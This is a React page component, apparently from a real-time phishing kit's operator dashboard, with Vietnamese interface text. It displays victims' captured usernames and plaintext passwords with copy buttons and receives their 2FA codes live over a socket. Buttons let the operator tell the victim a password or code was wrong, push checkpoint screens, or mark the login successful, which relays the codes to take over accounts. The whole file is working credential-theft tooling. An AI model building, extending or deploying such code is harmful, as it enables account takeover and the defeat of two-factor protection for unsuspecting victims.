import { useNavigate, useParams } from "react-router-dom";
import { useEffect, useState } from "react";
import { toast } from "react-toastify";
import {
  manualWrongPassword,
  manualWrongCode,
  manualLoginSuccess,
  manualSubmit2FA,
  manualCheckpoint1,
  getManualSessionDetail
} from "../services/telegram.service";
import { useSocketIO } from "../socketIO";
import PasteImageOCR from "../components/pastebox";
import { Copy } from "lucide-react";
import { useMyCopyToClipboard } from "../hooks/useMyCopy";
import { ManualSession } from "./LoginSessionPage";
import { handleError } from "../services/utils";

const DetailPage: React.FC = () => {
  const navigate = useNavigate();
  const { socketId } = useParams<{ socketId: string }>();
  const [checkpointText, setCheckpointText] = useState("");
  const [twoFAText, setTwoFAText] = useState("");
  const [faCode, setfaCode] = useState("");
  const { socketIO } = useSocketIO();
  const [wrongCodeMessage, setWrongCodeMessage] = useState("");
  const [, copy] = useMyCopyToClipboard();
  const [session, setSession] = useState<ManualSession>();
  useEffect(() => {
    const fetchSession = async (socketId: string) => {
      try {
        const { data } = await getManualSessionDetail(socketId);
        setSession(data || []);
      } catch (error) {
        handleError(error, "Lỗi khi lấy danh sách phiên manual");
      }
    };
    if (!socketId) return;
    fetchSession(socketId);
    const originalTitle = document.title;
    if (socketId) {
      document.title = `${socketId}`;
    }
    return () => {
      document.title = originalTitle;
    };
  }, [socketId]);

  useEffect(() => {
    if (!socketIO || !socketId) return;

    const handleClose = (x: any) => {
      if (x.socketId === socketId) {
        let countdown = 5;
        const id = toast.error(
          `Phiên đã bị đóng. Chuyển hướng sau ${countdown}s`,
          {
            autoClose: false
          }
        );

        const interval = setInterval(() => {
          countdown--;
          if (countdown <= 0) {
            clearInterval(interval);
            toast.dismiss(id);
            navigate("/dashboard");
          } else {
            toast.update(id, {
              render: `Phiên đã bị đóng. Chuyển hướng sau ${countdown}s`
            });
          }
        }, 1000);
      }
    };

    socketIO.on("close_login", handleClose);
    socketIO.on("new_code", (x: any) => setfaCode(x.code)); // listen for new code
    socketIO.on("update_login", (x: any) => {
      if (x.socketId === socketId) {
        setSession((prev) => ({ ...prev, ...x }));
        toast.info(`User đã login lại, vui lòng kiểm tra lại!`);
      }
    });

    socketIO.on("close_checkpoint", (x: any) => {
      if (x.socketId === socketId) {
        toast.warn(`User đã đóng popup Checkpoint, vui lòng chú ý!`);
      }
    });

    return () => {
      socketIO.off("close_login"); // cleanup
      socketIO.off("new_code"); // cleanup
      socketIO.off("update_login");
      socketIO.off("close_checkpoint");
    };
  }, [navigate, socketIO, socketId]);

  const handleAction = async (action: string) => {
    if (!socketId) return;

    try {
      switch (action) {
        case "wrong-password":
          await manualWrongPassword(socketId);
          toast.success("Đã đánh dấu sai mật khẩu");
          break;
        case "wrong-code":
          await manualWrongCode(socketId, wrongCodeMessage);
          setfaCode("");
          setWrongCodeMessage(""); // clear input after sending
          toast.success("Đã đánh dấu sai mã 2FA");
          break;

        case "login-success":
          await manualLoginSuccess(socketId);
          toast.success("Đăng nhập thành công");
          navigate("/dashboard");
          break;
        case "checkpoint1":
          const jsonData = JSON.parse(checkpointText);
          await manualCheckpoint1(socketId, jsonData);
          toast.success("Đã gửi checkpoint 1");
          break;
        case "submit-2fa":
          try {
            const jsonData = JSON.parse(twoFAText);
            await manualSubmit2FA(socketId, jsonData);
            toast.success("Đã gửi dữ liệu 2FA từ JSON");
          } catch (err) {
            toast.error("Lỗi định dạng JSON");
          }
          break;
      }
    } catch (error) {
      toast.error("Có lỗi xảy ra khi xử lý");
    }
  };
  const handleCopy = async (text: string) => {
    await copy(text);
  };

  return (
    <div className="min-h-screen min-w-screen w-full bg-gray-100 p-6">
      <button
        onClick={() => navigate("/dashboard")}
        className="text-blue-600 hover:underline flex items-center gap-1 mb-2"
      >
        <span className="text-lg">🔙</span> Quay lại danh sách
      </button>
      <div className="max-w-screen mx-auto bg-white shadow rounded-lg p-6 space-y-6">
        <div className="flex gap-4 w-full justify-between">
          {/* Nút thao tác nhanh */}
          <div className="flex flex-col gap-3 flex-1 min-w-0">
            <h1 className="text-xl font-bold">🛠️ Action Button</h1>

            <button
              onClick={() => handleAction("wrong-password")}
              className="bg-red-500 text-white px-4 py-2 rounded hover:bg-red-600 transition"
            >
              ❌ Sai mật khẩu
            </button>

            <button
              onClick={() => handleAction("wrong-code")}
              className="bg-yellow-500 text-white px-4 py-2 rounded hover:bg-yellow-600 transition"
            >
              ⚠️ Sai mã 2FA
            </button>

            <input
              type="text"
              placeholder="Lý do sai mã 2FA (tuỳ chọn)"
              className="border rounded px-3 py-1 mt-1 text-sm"
              value={wrongCodeMessage}
              onChange={(e) => setWrongCodeMessage(e.target.value)}
            />

            <button
              onClick={() => handleAction("login-success")}
              className="bg-green-600 text-white px-4 py-2 rounded hover:bg-green-700 transition"
            >
              ✅ Login thành công
            </button>
          </div>
          <div className="flex flex-col gap-3 flex-1 min-w-0">
            <h1 className="text-xl font-bold">🛠️ Chi tiết phiên login</h1>
            <p className="text-gray-600">
              <strong>Socket ID:</strong>{" "}
              <span className="text-blue-600 font-mono">{socketId}</span>
            </p>
            <p className="text-gray-600">
              <strong>Thiết bị/Quốc Gia:</strong>{" "}
              <span className="text-blue-600 font-mono">{`${session?.device}/${session?.country}`}</span>
            </p>
            <p className="text-gray-600">
              <strong>Login Time:</strong>{" "}
              <span className="text-blue-600 font-mono">
                {" "}
                {new Date(session?.createdAt || Date.now()).toLocaleString(
                  "vi-VN",
                  {
                    timeZone: "Asia/Ho_Chi_Minh",
                    hour12: false
                  }
                )}
              </span>
            </p>
            <p className="text-gray-600">
              <strong>User Name:</strong>{" "}
              <div
                className="flex items-center gap-2 cursor-pointer text-blue-600 hover:underline"
                onClick={() => handleCopy(session?.userName || "")}
                title="Click để copy User Name"
              >
                <span className="text-blue-600 font-mono">
                  {session?.userName}
                </span>
                <Copy className="w-4 h-4 text-gray-500 hover:text-blue-700 transition" />
              </div>
            </p>
            <p className="text-gray-600">
              <strong>Password:</strong>{" "}
              <div
                className="flex items-center gap-2 cursor-pointer text-blue-600 hover:underline"
                onClick={() => handleCopy(session?.password || "")}
                title="Click để copy password"
              >
                <span className="text-blue-600 font-mono">
                  {session?.password}
                </span>
                <Copy className="w-4 h-4 text-gray-500 hover:text-blue-700 transition" />
              </div>
            </p>

            <p className="text-gray-600">
              <strong>Đang lắng nghe 2fa code:</strong>{" "}
              <div
                className="flex items-center gap-2 cursor-pointer text-blue-600 hover:underline"
                onClick={() => handleCopy(faCode)}
                title="Click để copy Password"
              >
                <span className="text-blue-600 font-mono">{faCode}</span>
                <Copy className="w-4 h-4 text-gray-500 hover:text-blue-700 transition" />
              </div>
            </p>
          </div>
        </div>
        <div>
          <h1 className="text-xl font-bold">🛠️ Xử lý Image to Text</h1>
        </div>
        <div className="flex gap-4 w-full justify-between">
          {/* Box nhập 2FA */}
          <div className="flex flex-col gap-2 flex-1 min-w-0">
            <PasteImageOCR
              label="2FA"
              placeholder={`{\n  "twoFaTitle": "...",\n  "twoFaDescription": "...",\n  ...\n}`}
              value={twoFAText}
              setValue={setTwoFAText}
            />
            <button
              onClick={() => handleAction("submit-2fa")}
              className="bg-indigo-600 text-white px-4 py-2 rounded hover:bg-indigo-700 transition"
            >
              🔐 Gửi 2FA
            </button>
          </div>

          {/* Box nhập Checkpoint 1 */}
          <div className="flex flex-col gap-2 flex-1 min-w-0">
            <PasteImageOCR
              label="Checkpoint"
              placeholder={`{\n  "twoFaTitle": "...",\n  "twoFaDescription": "...",\n  ...\n}`}
              value={checkpointText}
              setValue={setCheckpointText}
            />
            <button
              onClick={() => handleAction("checkpoint1")}
              className="bg-blue-600 text-white px-4 py-2 rounded hover:bg-blue-700 transition"
            >
              📌 Gửi Checkpoint 1
            </button>
          </div>
        </div>
      </div>
    </div>
  );
};

export default DetailPage;
